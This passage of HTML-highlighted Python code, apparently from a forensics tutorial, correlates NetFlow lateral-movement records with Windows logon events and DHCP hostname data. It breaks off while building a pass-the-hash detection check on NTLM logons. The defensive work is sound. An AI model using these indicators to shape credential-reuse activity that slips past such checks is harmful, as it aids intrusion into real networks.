style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> KeyError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[+] NetFlow: loaded 
</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">self</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token string-interpolation interpolation\">netflow_events</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> lateral-movement-port records\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">load_auth_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Load Windows authentication events.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">csv_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> row </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> csv</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">DictReader</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">auth_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">fromisoformat</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_id'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 
35%)\">int</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_id'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'account'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    
    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'key_length'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'key_length'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'service'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> row</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'service'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">''</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> KeyError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[+] Auth: loaded </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">self</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 
16%)\">.</span><span class=\"token string-interpolation interpolation\">auth_events</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> authentication events\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">correlate</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> time_window_seconds</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">30</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        Main correlation: for each NetFlow lateral movement 
record,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        find the corresponding auth event within the time window.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        Enrich both with DHCP hostname resolution.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">        \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> flow </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sorted</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">netflow_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> key</span><span 
class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            flow_ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            src_ip  </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> flow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            dst_ip  </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> flow</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Resolve IPs to hostnames using DHCP timeline</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            src_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> src_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">resolve_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">src_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            dst_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> dst_mac </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">resolve_ip</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">dst_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find matching auth event within time window</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            matching_auth </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            window </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> timedelta</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">seconds</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">time_window_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 
47%)\">for</span><span class=\"token plain\"> auth </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> self</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">auth_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">abs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'ts'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> flow_ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">total_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;=</span><span class=\"token plain\"> time_window_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_ip'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> src_ip </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"> auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'3'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        matching_auth </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> auth</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
16%)\"><span class=\"token plain\">                        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Determine if this is suspicious</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            suspicion_flags </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Pass-the-hash indicator</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'auth_pkg'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'NTLM'</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">and</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    matching_auth</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'key_length'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 